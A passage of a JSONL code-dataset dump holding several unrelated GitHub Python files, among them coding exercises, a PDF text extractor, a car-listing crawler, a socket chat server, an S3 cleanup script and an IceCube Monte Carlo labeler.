Set)')\nplt.legend(bbox_to_anchor=(0.6, 0.8), loc='upper left', borderaxespad=0.)\n\n\n\n\"\"\" Test Set Prediction \"\"\"\n\npredtest1=[]\nfor i in range(500): \n    ppt= y1(test_set[i]) \n    predtest1.append(ppt)\n\npredtest=abs(predtest1-test_outputs)\n\n\n\n\n\"\"\" Mean Square Error for Test Set \"\"\"\n\nmsetest= (sum((predtest*predtest)))/500\n\n'{0:.6f}'.format(msetest)\n\n\n\n\n\"\"\"Plot of Predicted Result and True Output (Test Set)\"\"\"\n\nplt.figure(figsize=(8, 6))\nplt.plot(test_set,test_outputs,color='b', marker='o', label='True Output')\nplt.plot(test_set,predtest1,color='r', marker='o', label='Predicted Output')\nplt.ylabel('Result (y)')\nplt.xlabel('Input value (x)')\nplt.title('Plot of Predicted Result and True Output (Test Set)')\nplt.legend(bbox_to_anchor=(0.6, 0.8), loc='upper left', borderaxespad=0.)\n\n\n\n\n\n\n\n\n","repo_name":"JamiuAdegbite/Binuyo","sub_path":"Approximation of a Function by MultiLayer Perceptron.py","file_name":"Approximation of a Function by MultiLayer Perceptron.py","file_ext":"py","file_size_in_byte":9843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"32324619615","text":"# 496. Next Greater Element I\n# The next greater element of some element x in an array is the first greater element \n# that is to the right of x in the same array.\n# You are given two distinct 0-indexed integer arrays nums1 and nums2, where nums1 is a subset of nums2.\n# For each 0 <= i < nums1.length, find the index j such that nums1[i] == nums2[j] \n# and determine the next greater element of nums2[j] in nums2. 
\n# If there is no next greater element, then the answer for this query is -1.\n# Return an array ans of length nums1.length such that ans[i] is the next greater element as described above.\n# Scott 2021/08/23\n\nfrom typing import List\n\nclass Solution:\n\n # Original Brute force\n # 28%\n def nextGreaterElement(self, nums1: List[int], nums2: List[int]) -> List[int]:\n result = []\n for i in range(len(nums1)):\n a = nums1[i]\n if a in nums2:\n found = False\n index = nums2.index(a)\n for j in range(index + 1, len(nums2)):\n b = nums2[j]\n if b > a:\n found = True\n result.append(b)\n break\n if not found:\n result.append(-1)\n else:\n result.append(-1)\n return result\n ","repo_name":"ScottCTD/Programming-Practices","sub_path":"LeetCode/python/Q496.py","file_name":"Q496.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"30815965396","text":"#cadastrar valores em uma lista\nvalores = list()\n#caso o número já exista, não adiciona\nwhile True:\n valor = (int(input(\"Digite um valor: \")))\n if valor in valores:\n print(f'Valor duplicado, não adicionado {valor}')\n else:\n valores.append(valor)\n print(f'Valor adicionado com sucesso: {valores}')\n continuar = str(input(\"Deseja continuar? [S/N] \")).upper().strip()[0]\n if continuar == 'N':\n break\nprint(\"-\"*30)\nprint(f'Você digitou os valores {sorted(valores)}')\nprint(\"-\"*30)\n","repo_name":"edgarssc/estudos_pf","sub_path":"Python/pythonexercicios/aula17_listas_desafio79.py","file_name":"aula17_listas_desafio79.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"25409122058","text":"from ufwi_rpcd.common.transaction import Transaction\nfrom ufwi_rpcd.backend.logger import Logger\nfrom ufwi_ruleset.iptables.sysctl import sysctlGet, sysctlSet\n\nclass IPForward(Transaction, Logger):\n def __init__(self, enable, ipv6, logger):\n if ipv6:\n name = 'ipv6_forward'\n else:\n name = 'ipv4_forward'\n Logger.__init__(self, name, parent=logger)\n self.enable = enable\n if ipv6:\n self.sysctl_key = u'net.ipv6.conf.all.forwarding'\n else:\n self.sysctl_key = u'net.ipv4.ip_forward'\n\n def save(self):\n value = sysctlGet(self.sysctl_key)\n self.was_enabled = (value == '1')\n self.info(\"Get current state: %s\" % self.was_enabled)\n\n def setState(self, enabled):\n if enabled:\n self.warning(\"Enable forward\")\n value = u'1'\n else:\n self.warning(\"Disable forward\")\n value = u'0'\n sysctlSet(self, self.sysctl_key, value)\n\n def apply(self):\n self.setState(self.enable)\n\n def restore(self):\n self.setState(self.was_enabled)\n\n","repo_name":"maximerobin/Ufwi","sub_path":"etude_de_base/ufwi-administration-suite-ufwi-ruleset/ufwi_ruleset/iptables/ip_forward.py","file_name":"ip_forward.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"31"} +{"seq_id":"44013608510","text":"import fitz\nimport matplotlib.pyplot as plt\nfrom categorizers.body_text_block_categorizer import BodyTextBlockCategorizer\nfrom categorizers.fragmented_block_categorizer import FragmentedTextBlockCategorizer\nfrom itertools import islice\nfrom matplotlib.patches import Rectangle\nfrom pathlib import Path\nfrom termcolor import colored\nfrom utils.calculator import (\n flatten_len,\n kilo_count,\n rect_area,\n char_per_pixel,\n avg_line_width,\n)\n\nfrom utils.logger import logger, 
add_fillers, Runtimer\nfrom utils.tokenizer import (\n WordTokenizer,\n)\nfrom utils.text_processor import TextBlock\n\n\nclass PDFStreamExtractor:\n pdf_root = Path(__file__).parents[1] / \"pdfs\"\n image_root = pdf_root / \"images\"\n\n def __init__(self):\n pdf_filename = \"Exploring pathological signatures for predicting the recurrence of early-stage hepatocellular carcinoma based on deep learning.pdf\"\n self.pdf_filename = pdf_filename\n self.pdf_fullpath = self.pdf_root / self.pdf_filename\n self.pdf_doc = fitz.open(self.pdf_fullpath)\n\n def extract_all_texts(self):\n for idx, page in enumerate(self.pdf_doc):\n text = page.get_text(\"block\")\n logger.info(f\"Page {idx+1}:\")\n logger.debug(text)\n\n def calc_rect_center(self, rect, reverse_y=False):\n if reverse_y:\n x0, y0, x1, y1 = rect[0], -rect[1], rect[2], -rect[3]\n else:\n x0, y0, x1, y1 = rect\n\n x_center = (x0 + x1) / 2\n y_center = (y0 + y1) / 2\n return (x_center, y_center)\n\n def plot_text_block_rect(self, points, rects, categories, point_texts):\n fig, ax = plt.subplots()\n colors = [\"b\", \"r\", \"g\", \"c\", \"m\", \"y\", \"k\"]\n\n for i, rect_center in enumerate(points):\n category_idx = categories[i]\n color = colors[category_idx]\n x0, y0, x1, y1 = rects[i]\n rect = Rectangle((x0, -y0), x1 - x0, -y1 + y0, fill=False, edgecolor=color)\n ax.add_patch(rect)\n x, y = rect_center\n plt.scatter(x, y, color=color)\n plt.annotate(point_texts[i], rect_center)\n plt.show()\n\n def extract_all_text_blocks(self):\n # * https://pymupdf.readthedocs.io/en/latest/textpage.html#TextPage.extractBLOCKS\n\n rect_centers = []\n rects = []\n point_texts = []\n categorize_vectors = []\n doc_blocks = []\n tokenizer = WordTokenizer()\n doc_token_cnt = 0\n for page_idx, page in islice(enumerate(self.pdf_doc), len(self.pdf_doc)):\n page_blocks = page.get_text(\"blocks\")\n doc_blocks.append(page_blocks)\n page_cnt = page_idx + 1\n logger.info(\n colored(\n add_fillers(f\"Start [Page {page_cnt}] [{len(page_blocks)} blocks]\"),\n \"light_yellow\",\n )\n )\n block_cnt = 0\n page_token_cnt = 0\n for block in page_blocks:\n # Process block values\n block_rect = block[:4] # (x0,y0,x1,y1)\n block_text = block[4]\n block_num = block[5]\n block_cnt = block_num + 1\n # block_cnt += 1\n block_type = \"text\" if block[6] == 0 else \"image\"\n\n if block_type == \"text\":\n token_cnt = tokenizer.count_tokens(block_text.replace(\"\\n\", \" \"))\n page_token_cnt += token_cnt\n else:\n token_cnt = 0\n\n categorize_vectors.append((*block_rect, block_text))\n\n # Prepare for plot categorization of text blocks\n rects.append(block_rect)\n rect_center = self.calc_rect_center(block_rect, reverse_y=True)\n rect_centers.append(rect_center)\n point_text = f\"({page_cnt}.{block_cnt})\"\n point_texts.append(point_text)\n\n # Logging\n token_cnt_str = \"\"\n if block_type == \"text\":\n token_cnt_str = f\"| (tokens: {token_cnt})\"\n logger.info(\n f\"<{block_type}> Block: {page_cnt}.{block_cnt} {token_cnt_str}\"\n )\n\n logger.debug(f\"{rect_center} - {block_rect}\")\n logger.debug(block_text)\n\n doc_token_cnt += page_token_cnt\n\n logger.info(f\"{page_token_cnt} tokens in Page {page_cnt}.\")\n logger.info(\n colored(\n add_fillers(f\"End [Page {page_cnt}] [{len(page_blocks)} blocks]\"),\n \"light_magenta\",\n )\n )\n\n doc_token_cnt_kilo = kilo_count(doc_token_cnt)\n logger.info(\n colored(\n f\"{doc_token_cnt_kilo}k ({doc_token_cnt}) tokens in whole document.\\n\",\n \"light_green\",\n )\n )\n\n categorizer = BodyTextBlockCategorizer(categorize_vectors)\n 
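# NOTE: each categorize_vectors entry is (x0, y0, x1, y1, block_text); run() presumably fits the body-text classifier and fills categorizer.categories with one label per block.\n        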
categorizer.run()\n\n # self.plot_text_block_rect(\n # categories=categorizer.categories,\n # points=rect_centers,\n # rects=rects,\n # point_texts=point_texts,\n # )\n\n filtered_doc_blocks = self.remove_no_body_text_blocks(\n doc_blocks=doc_blocks, categories=categorizer.categories\n )\n\n def save_image(self, xref, basepath):\n ext_image = self.pdf_doc.extract_image(xref)\n ext = ext_image[\"ext\"]\n fullpath = basepath.with_suffix(f\".{ext}\")\n print(f\" > Saving image to: {fullpath}\")\n pix = fitz.Pixmap(self.pdf_doc, xref)\n pix.save(fullpath)\n\n def extract_images(self):\n img_idx = 0\n for page_idx, page in enumerate(self.pdf_doc):\n img_infos = page.get_images()\n print(f\"Page {page_idx}: {img_infos}\")\n for info in img_infos:\n xref = info[0]\n img_basepath = self.image_root / f\"img_{img_idx+1}\"\n self.save_image(xref, img_basepath)\n img_idx += 1\n\n def extract_all_text_block_dicts(self):\n \"\"\"\n * https://pymupdf.readthedocs.io/en/latest/textpage.html#TextPage.extractDICT\n * https://pymupdf.readthedocs.io/en/latest/textpage.html#structure-of-dictionary-outputs\n * https://pymupdf.readthedocs.io/en/latest/_images/img-textpage.png\n * https://pymupdf.readthedocs.io/en/latest/textpage.html#block-dictionaries\n\n Data Structure of a Text/Image Block Dict in Page Blocks:\n\n ```json\n {\n \"width\": ,\n \"height\": ,\n \"blocks\": [\n {\n \"type\": (0), // \"text\"\n \"bbox\": (4 floats),\n \"number\": (start from 0),\n \"lines\": [\n {\n \"bbox\": (4 floats),\n \"wmode\": (0),\n \"dir\": (2 floats),\n \"spans\": [\n {\n \"bbox\": (4 floats),\n \"origin\": (2 floats),\n \"flags\": ,\n \"size\": ,\n \"font\" ,\n \"color\": ,\n \"ascender\": ,\n \"descender\": ,\n \"text\": \n },\n ...\n ]\n },\n ...\n ]\n },\n {\n \"type\": (1), // \"image\"\n \"bbox\": (4 floats),\n \"number\": ,\n \"width\": ,\n \"height\": ,\n \"ext\": (\"jpeg\"),\n \"colorspace\": ,\n \"xres\": ,\n \"yres\": ,\n \"bpc\": ,\n \"transform\": (6 floats),\n \"size\": ,\n \"image\": \n },\n ...\n ]\n }\n ```\n \"\"\"\n doc_blocks = [\n page.get_text(\"dict\")[\"blocks\"]\n for page_idx, page in islice(enumerate(self.pdf_doc), len(self.pdf_doc))\n ]\n body_text_block_categorizer = BodyTextBlockCategorizer(doc_blocks)\n body_text_block_categorizer.run()\n self.filtered_doc_blocks = body_text_block_categorizer.filtered_doc_blocks\n\n filtered_doc_text_blocks = [\n [block for block in page_blocks if block[\"type\"] == 0]\n for page_blocks in self.filtered_doc_blocks\n ]\n logger.info(\n f\"{flatten_len(filtered_doc_text_blocks)} text blocks in {flatten_len(self.filtered_doc_blocks)} blocks.\"\n )\n\n fragmented_text_block_categorizer = FragmentedTextBlockCategorizer(\n filtered_doc_text_blocks\n )\n fragmented_text_block_categorizer.run()\n\n return\n\n for page_idx, page_blocks in enumerate(self.filtered_doc_blocks[:9]):\n doc_blocks.append(page_blocks)\n logger.info(\n colored(\n f\"{len(page_blocks)} blocks in Page {page_idx+1}\", \"light_magenta\"\n )\n )\n block_cnt = 0\n for block in page_blocks:\n block_type = \"text\" if block[\"type\"] == 0 else \"image\"\n block_num = block[\"number\"]\n block_cnt += 1\n block_bbox = block[\"bbox\"]\n block_area = rect_area(*block_bbox)\n\n logger.info(\n colored(\n f\"<{block_type}> Block {block_num}/{len(page_blocks)} \"\n f\"in Page {page_idx+1}/{len(self.filtered_doc_blocks)}\",\n \"light_yellow\",\n )\n )\n\n if block_type == \"text\":\n tblock = TextBlock(block)\n block_text = tblock.get_block_text()\n block_bbox = tblock.get_bbox()\n block_font, block_fontsize 
= tblock.get_block_main_font()\n block_tokens_num = tblock.get_block_tokens_num()\n block_density = char_per_pixel(len(block_text), block_area)\n logger.info(\n colored(\n f\"<{block_font}> <{block_fontsize}> \"\n f\"({len(block_text)}/{block_area}) ({block_density}) \"\n f\"({avg_line_width(block_text)})\",\n \"light_magenta\",\n )\n )\n logger.info(colored(f\"{block_tokens_num} tokens.\", \"light_green\"))\n logger.info(colored(f\"{block_text}\", \"light_cyan\"))\n\n elif block_type == \"image\":\n img_width = block[\"width\"]\n img_height = block[\"height\"]\n img_ext = block[\"ext\"]\n img_size = block[\"size\"]\n img_size_mb = round(img_size / (1024 * 1024), 1)\n img_bytes = block[\"image\"]\n logger.info(\n colored(\n f\"<{img_ext.upper()}> <{img_width}x{img_height}> ({img_size_mb} MB)\",\n \"light_magenta\",\n )\n )\n else:\n raise ValueError(f\"Unknown block type: {block_type}\")\n\n def extract_all_text_htmls(self):\n html_str = \"\"\n for page_idx, page in islice(enumerate(self.pdf_doc), len(self.pdf_doc)):\n html_str += page.get_text(\"html\")\n with open(\"output.html\", \"w\") as wf:\n wf.write(html_str)\n\n def replace_html_entities(self, text):\n symbols = {\n \" \": \" \",\n \"&\": \"&\",\n }\n for k, v in symbols.items():\n text = text.replace(k, v)\n return text\n\n def format_toc(self):\n levels = [0] * 10\n lines = []\n for level, title, page, dest in self.pdf_toc:\n levels[level - 1] += 1\n for i in range(level, len(levels)):\n levels[i] = 0\n\n level_str = \".\".join(map(str, levels[1:level]))\n trailing_level_str = \" \" if level > 1 else \"\"\n leading_level_str = \" \" * 2 * max(level - 2, 0)\n\n title_str = self.replace_html_entities(title)\n\n lines.append(\n f\"{leading_level_str}{level_str}{trailing_level_str}{title_str}\"\n )\n\n for line in lines:\n print(line)\n\n def extract_toc(self):\n self.pdf_toc = self.pdf_doc.get_toc(simple=False)\n self.format_toc()\n\n def extract_tables(self):\n table_parser = PDFTableExtractor(self.pdf_fullpath)\n table_parser.run()\n\n def run(self):\n # self.extract_all_texts()\n # self.extract_all_text_blocks()\n # self.extract_toc()\n # self.extract_images()\n # self.extract_all_text_htmls()\n # self.extract_all_text_block_dicts()\n # self.extract_tables()\n pass\n","repo_name":"Hansimov/GPT-Paper","sub_path":"documents/pdf_stream_extractor.py","file_name":"pdf_stream_extractor.py","file_ext":"py","file_size_in_byte":13487,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"31"} +{"seq_id":"13616282939","text":"class Student:\n class_ = \"student\"\n\n def __init__(self, name, age):\n self.name = name\n self.age = age\n\n def score_calculator(self, score1, score2, score3):\n total = score1 + score2 + score3\n avg_test_score = total/3\n return avg_test_score\n\nJohn = Student(\"John\", \"21\")\nJane = Student(\"Jane\", \"22\")\n\nprint(John.class_)\nprint(Jane.score_calculator(6, 10, 20))","repo_name":"kirankalsi/python-exercises","sub_path":"programs/classes_attributes_ex.py","file_name":"classes_attributes_ex.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"12986925241","text":"import sys, time, socket, threading \n\nclass bcolors:\n HEADER = '\\033[95m'\n BLUE = '\\033[94m'\n CYAN = '\\033[96m'\n GREEN = '\\033[92m'\n WARNING = '\\033[93m'\n FAIL = '\\033[91m'\n ENDC = '\\033[0m'\n BOLD = '\\033[1m'\n UNDERLINE = '\\033[4m'\n\nbanner = \"\"\" \n _____ _____ _____ _____ \n | | | | 
_ |_ _| \n | --| | | | | \n |_____|__|__|__|__| |_| \n _____ _____ _____ _____ _____ _____ \n| __| __| __ | | | __| __ |\n|__ | __| -| | | __| -|\n|_____|_____|__|__|\\___/|_____|__|__|\n\n[+] Welcome to our simple chatroom [+]\n\"\"\"\nhost = '127.0.0.1' \nport = 12345 \n\nserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \nserver.bind((host, port)) \nserver.listen()\n\nclients = []\nnicknames = []\n\ndef banner_slowprint(s):\n\tfor c in s + '\\n':\n\t\tsys.stdout.write(c)\n\t\tsys.stdout.flush()\n\t\ttime.sleep(.01/10)\n\t\t\ndef slowprint(s):\n\tfor c in s + '\\n':\n\t\tsys.stdout.write(c)\n\t\tsys.stdout.flush()\n\t\ttime.sleep(1/10)\n\t\t\ndef broadcast(message): \n for client in clients:\n client.send(message)\n\ndef handle(client): \n while True:\n try: \n message = client.recv(1024)\n broadcast(message)\n except: \n index = clients.index(client)\n clients.remove(client)\n client.close()\n nickname = nicknames[index]\n broadcast('{} left in the chatroom!\\n'.format(nickname).encode('ascii'))\n nicknames.remove(nickname)\n break\n\ndef receive(): \n while True:\n client, address = server.accept()\n slowprint(bcolors.GREEN+\"[CONNECTED] Connected with {}\".format(str(address))) \n client.send('NICKNAME'.encode('ascii'))\n nickname = client.recv(1024).decode('ascii')\n nicknames.append(nickname)\n clients.append(client)\n slowprint(\"[CLIENT] {}\".format(nickname))\n broadcast(\"[CLIENT] {} joined in the chatroom!\".format(nickname).encode('ascii'))\n #client.send('[!] Connected to the server...\\n'.encode('ascii'))\n #client.send('\\n[+] You can now start chatting...'.encode('ascii'))\n thread = threading.Thread(target=handle, args=(client,))\n thread.start()\n\nbanner_slowprint(bcolors.HEADER+banner+bcolors.ENDC)\nslowprint(bcolors.WARNING+\"[STARTING] Server is starting...\"+bcolors.ENDC)\nslowprint(bcolors.GREEN+\"[STARTED] Server is up and running...\"+bcolors.ENDC)\nslowprint(bcolors.BLUE+\"[WAITING] Waiting for clients to connect...\"+bcolors.ENDC)\nreceive()\n","repo_name":"mkdirlove/CHAT-APP","sub_path":"v2/chat_server.py","file_name":"chat_server.py","file_ext":"py","file_size_in_byte":3031,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"31"} +{"seq_id":"18264097220","text":"from simplematrixbotlib import Config\nfrom os import environ\n\n\nclass FileConfig(Config):\n keys = [\"HOMESERVER\", \"USERNAME\", \"PASSWORD\", \"LOGIN_TOKEN\",\n \"ACCESS_TOKEN\", \"OPEN_AI_KEY\", \"REPLICATE_API_TOKEN\", \"ENABLE_ENCRYPTION\"]\n\n def __init__(self, config_path):\n super().__init__()\n if \"CONFIG_PATH\" in environ.keys():\n config_path = environ[\"CONFIG_PATH\"]\n if config_path is None:\n config_path = \"config/config.yml\"\n self._load_env_dict()\n self.load_toml(config_path)\n if hasattr(self, \"ENABLE_ENCRYPTION\") and self.ENABLE_ENCRYPTION:\n self._enable_encryption()\n\n def _set_attr(self, key, value):\n print(f\"Setting {key} to {value}\")\n setattr(self, key, value)\n\n def _enable_encryption(self):\n self.encryption_enabled = True\n self.emoji_verify = True\n self.ignore_unverified_devices = True\n self.store_path = './crypto_store/'\n\n def _load_env_dict(self):\n for key in self.keys:\n if key.upper() in environ.keys():\n self._set_attr(key.upper(), environ[key.upper()])\n if key.lower() in environ.keys():\n self._set_attr(key.upper(), environ[key.lower()])\n\n def _load_config_dict(self, config_dict: dict) -> None:\n for key, value in config_dict.items():\n key = key.upper()\n if hasattr(self, key) and 
getattr(self, key) is not None:\n                continue\n            if value == 'True' or value == 'true':\n                value = True\n            elif value == 'False' or value == 'false':\n                value = False\n\n            self._set_attr(key, value)\n","repo_name":"ly1998117/MatrixChatGPTVoiceBot","sub_path":"matrix_chatgpt_voice_bot/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1690,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"31"} +{"seq_id":"11932918687","text":"'''\r\nCreated on 11 jun 2022\r\n\r\n@author: txema\r\n'''\r\nfrom functools import reduce\r\n\r\ndef pares(lista): \r\n    resultado = list(filter((lambda x: x % 2 == 0), lista)) \r\n    print(resultado)\r\n    resultado = reduce( (lambda x, y: x + y), resultado) \r\n    print(resultado)\r\n    \r\ndef pares1(numeros):\r\n    resultado1 = list(filter((lambda x: x%2==0), numeros))\r\n    print(resultado1)\r\n    resultado1 = reduce((lambda x ,y: x+y),resultado1)\r\n    print(resultado1)\r\n\r\nlista = list(range(100))\r\nnumeros = [1,2,3,4,5,6,7,8,9,10]\r\n\r\n\r\npares(lista)\r\npares1(numeros)","repo_name":"txematc/openBootcamp","sub_path":"practica/ejercicio_9_2.py","file_name":"ejercicio_9_2.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"810403438","text":"from core.pika_connect import connection, channel\n\nimport time\n\nfrom models.cars_8891 import cars_8891\nfrom core.database_mysql import get_db\n\nimport requests\nimport json\n\n\nMAX_RETRIES = 10\nSLEEP_TIME = 15\n\n\ndef craw8891(url, db):\n    \n    headers = {\n        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3',\n    }\n\n    for i in range(MAX_RETRIES):\n        try:\n            response = requests.get(url, headers=headers)\n            break\n        except:\n            time.sleep(SLEEP_TIME)\n    else:\n        print(f\"Failed to request get after {MAX_RETRIES} retries, exiting...\")\n        return False \n\n    json_data = json.loads(response.text)\n\n    datas = json_data['data']['data']\n\n    for data in datas:\n\n        new_data = cars_8891(data_id=data['id'],\n                        data=data)\n        \n        record = db.query(cars_8891).filter(cars_8891.data_id == data['id']).first()\n        \n        if record is None:\n            db.add(new_data)\n            db.commit()\n            db.refresh(new_data)\n        \n    return True\n\n\n\ndb = next(get_db())\n\n# craw8891('https://auto.8891.com.tw/usedauto-newSearch.html?page=4', db)\n\n\ndef callback(ch, method, properties, body):\n    \n    print(f' [x] Received: {body.decode()}')\n\n    url = body.decode()\n\n    result = craw8891(url, db)\n\n    time.sleep(5)\n    \n    if result:\n        ch.basic_ack(method.delivery_tag)\n    else:\n        ch.basic_nack(method.delivery_tag)\n\nchannel.queue_declare(queue='8891-queue', durable=True)\nchannel.basic_qos(prefetch_count=1)\n\nchannel.basic_consume(queue='8891-queue', on_message_callback=callback)\n\ntry:\n    channel.start_consuming()\nexcept KeyboardInterrupt:\n    channel.stop_consuming()\n\n\nconnection.close()\n","repo_name":"HankCodeLife/cars_crawler","sub_path":"consumer/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"27413282351","text":"from setuptools import setup, find_packages\n\nVERSION = '0.0.1' \nDESCRIPTION = 'Privacy Taxonomy'\nLONG_DESCRIPTION = \"Python interface to Ethyca's Privacy Taxonomy\"\n\nsetup(\n    name=\"privacy_taxonmy\", \n    version=VERSION,\n    author=\"Jason White\",\n    author_email=\"actinolite.jw@gmail.com\",\n    
description=DESCRIPTION,\n    long_description=LONG_DESCRIPTION,\n    packages=find_packages(),\n    install_requires=[\n        'owlready2'\n    ], \n    keywords=['python', 'privacy'],\n    classifiers= [\n        \"Development Status :: 3 - Alpha\",\n        \"Programming Language :: Python :: 3\",\n        \"Operating System :: MacOS :: MacOS X\",\n    ]\n)\n","repo_name":"JasonMWhite/privacy-taxonomy-python","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"20668185360","text":"#!/usr/bin/env python\n\nBUCKET = 'frontend-codereview-3-pipelin-artifactstorebucket-7s9c29rhnt9o'\n\nimport boto3\nimport sys\n\n\ns3 = boto3.resource('s3')\nbucket = s3.Bucket(sys.argv[1])\ntry:\n    bucket.object_versions.delete()\nexcept:\n    print(\"error deleting versions:\", sys.exc_info())\n\n# delete the now-empty bucket as well (comment out this line to keep the bucket):\nbucket.delete()\nprint(bucket)","repo_name":"BIBSYSDEV/NVA-infrastructure-test","sub_path":"utils/delete_bucket.py","file_name":"delete_bucket.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"39994398724","text":"t= int(input())\n\nl=[]\nfor i in range(t):\n    a,b = list(map(int,input().split()[:2]))\n    l.append((a,b))\n\n\nfor a,b in l:\n    sum=0\n    if b>a:\n        for k in range(a+1,b):\n            if k%2!=0:\n                sum+=k\n        print(sum)\n        sum=0\n    else:\n        for k in range(b+1,a):\n            if k%2!=0:\n                sum+=k\n        print(sum)\n        sum=0\n","repo_name":"Ksj14-kumar/DSA","sub_path":"Codeforces/Begginer/Sheet#2/Problem-17.py","file_name":"Problem-17.py","file_ext":"py","file_size_in_byte":374,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"13077094047","text":"#mc_labeler.py script\nfrom enums import (\n    cascade_interactions,\n    classification,\n    class_mapping,\n    containments_types,\n    interaction_types,\n    nugen_int_t_mapping,\n    track_interactions,\n    tau_interactions,\n)\n\nimport numpy as np\nimport warnings\nfrom icecube import dataclasses, dataio, MuonGun, icetray\nfrom icecube.dataclasses import I3Particle\nfrom I3Tray import I3Units\n\ntry:\n    from icecube import LeptonInjector\n\n    LI_FOUND = True\nexcept:\n    LI_FOUND = False\n\n\n# Convenience collections\nnegative_charged_leptons = [I3Particle.EMinus, I3Particle.MuMinus, I3Particle.TauMinus]\npositive_charged_leptons = [I3Particle.EPlus, I3Particle.MuPlus, I3Particle.TauPlus]\nall_charged_leptons = negative_charged_leptons + positive_charged_leptons\n\nmuon_types = [I3Particle.MuMinus, I3Particle.MuPlus]\ntau_types = [I3Particle.TauMinus, I3Particle.TauPlus]\nelectron_types = [I3Particle.EMinus, I3Particle.EPlus]\n\nneutrino_types = [I3Particle.NuE, I3Particle.NuMu, I3Particle.NuTau]\nanti_neutrino_types = [I3Particle.NuEBar, I3Particle.NuMuBar, I3Particle.NuTauBar]\nall_neutrinos = neutrino_types + anti_neutrino_types\n\nelectron_neutrinos = [I3Particle.NuE, I3Particle.NuEBar]\nmuon_neutrinos = [I3Particle.NuMu, I3Particle.NuMuBar]\ntau_neutrinos = [I3Particle.NuTau, I3Particle.NuTauBar]\n\n# from clsim\ncascade_types = [\n    I3Particle.Neutron,\n    I3Particle.Hadrons,\n    I3Particle.Pi0,\n    I3Particle.PiPlus,\n    I3Particle.PiMinus,\n    I3Particle.K0_Long,\n    I3Particle.KPlus,\n    I3Particle.KMinus,\n    I3Particle.PPlus,\n    I3Particle.PMinus,\n    I3Particle.K0_Short,\n    I3Particle.EMinus,\n    I3Particle.EPlus,\n    I3Particle.Gamma,\n    I3Particle.Brems,\n    I3Particle.DeltaE,\n    I3Particle.PairProd,\n    
I3Particle.NuclInt,\n]\n\n\nclass MCLabeler(icetray.I3Module):\n    def __init__(self, context):\n        super().__init__(context)\n        gcd = '/home/icecube/Desktop/eliz_zooniverse/icecubezooniverseproj_ver3/i3_files/GeoCalibDetectorStatus_2012.56063_V1.i3.gz'\n        open_gcd = dataio.I3File(gcd)\n        open_gcd.rewind()\n        frame1 = open_gcd.pop_frame(icetray.I3Frame.Geometry)\n        i3geo = frame1['I3Geometry']\n\n        self.AddParameter(\"gcd\", \"Path of GCD File. If None, use G frame\", i3geo\n)\n        self.AddParameter(\n            \"cr_muon_padding\",\n            \"Padding for CR muons. Increase to count muons passing further out. \",\n            150 * I3Units.m,\n        )\n        self.AddParameter(\n            \"det_hull_padding\",\n            \"Padding for the detector hull for calculating containment.\",\n            0 * I3Units.m,\n        )\n        self.AddParameter(\n            \"mcpe_pid_map_name\",\n            \"Name of the I3MCPESeriesMapParticleIDMap. Set to `None` to disable background MCPE counting.\"\n            \"Note: Naive MCPE downsampling will render I3MCPESeriesMapParticleIDMap useless\",\n            \"I3MCPESeriesMapParticleIDMap\",\n        )\n        self.AddParameter(\n            \"mcpe_map_name\",\n            \"Name of the I3MCPESeriesMap\",\n            \"I3MCPulseSeriesMap\",\n        )\n        self.AddParameter(\"mctree_name\", \"Name of the I3MCTree\", \"SignalI3MCTree\")\n        self.AddParameter(\n            \"bg_mctree_name\",\n            \"Name of the background I3MCTree. (Change if coincident events are in a\"\n            \" separate MCTree)\",\n            \"I3MCTree\",\n        )\n        self.AddParameter(\n            \"event_properties_name\", \"Name of the LI EventProperties.\", None\n        )\n        self.AddParameter(\"weight_dict_name\", \"Name of the I3MCWeightDict\", 'I3MCWeightDict')\n        self.AddParameter(\n            \"corsika_weight_map_name\", \"Name of the CorsikaWeightMap\", None\n        )\n        self.AddParameter(\"key_postfix\", \"Postfix for the keys stored in the frame\", \"\")\n\n        self._surface = None\n        self._surface_cr = None\n\n    def Configure(self):\n        self._geo = self.GetParameter(\"gcd\")\n        self._cr_muon_padding = self.GetParameter(\"cr_muon_padding\")\n        self._det_hull_padding = self.GetParameter(\"det_hull_padding\")\n        self._mcpe_pid_map_name = self.GetParameter(\"mcpe_pid_map_name\")\n        self._mcpe_map_name = self.GetParameter(\"mcpe_map_name\")\n        self._mctree_name = self.GetParameter(\"mctree_name\")\n        self._bg_mctree_name = self.GetParameter(\"bg_mctree_name\")\n        self._event_properties_name = self.GetParameter(\"event_properties_name\")\n        self._weight_dict_name = self.GetParameter(\"weight_dict_name\")\n        self._corsika_weight_map_name = self.GetParameter(\"corsika_weight_map_name\")\n        self._key_postfix = self.GetParameter(\"key_postfix\")\n\n        if (self._event_properties_name is not None) + (\n            self._weight_dict_name is not None) + (self._corsika_weight_map_name is not None) != 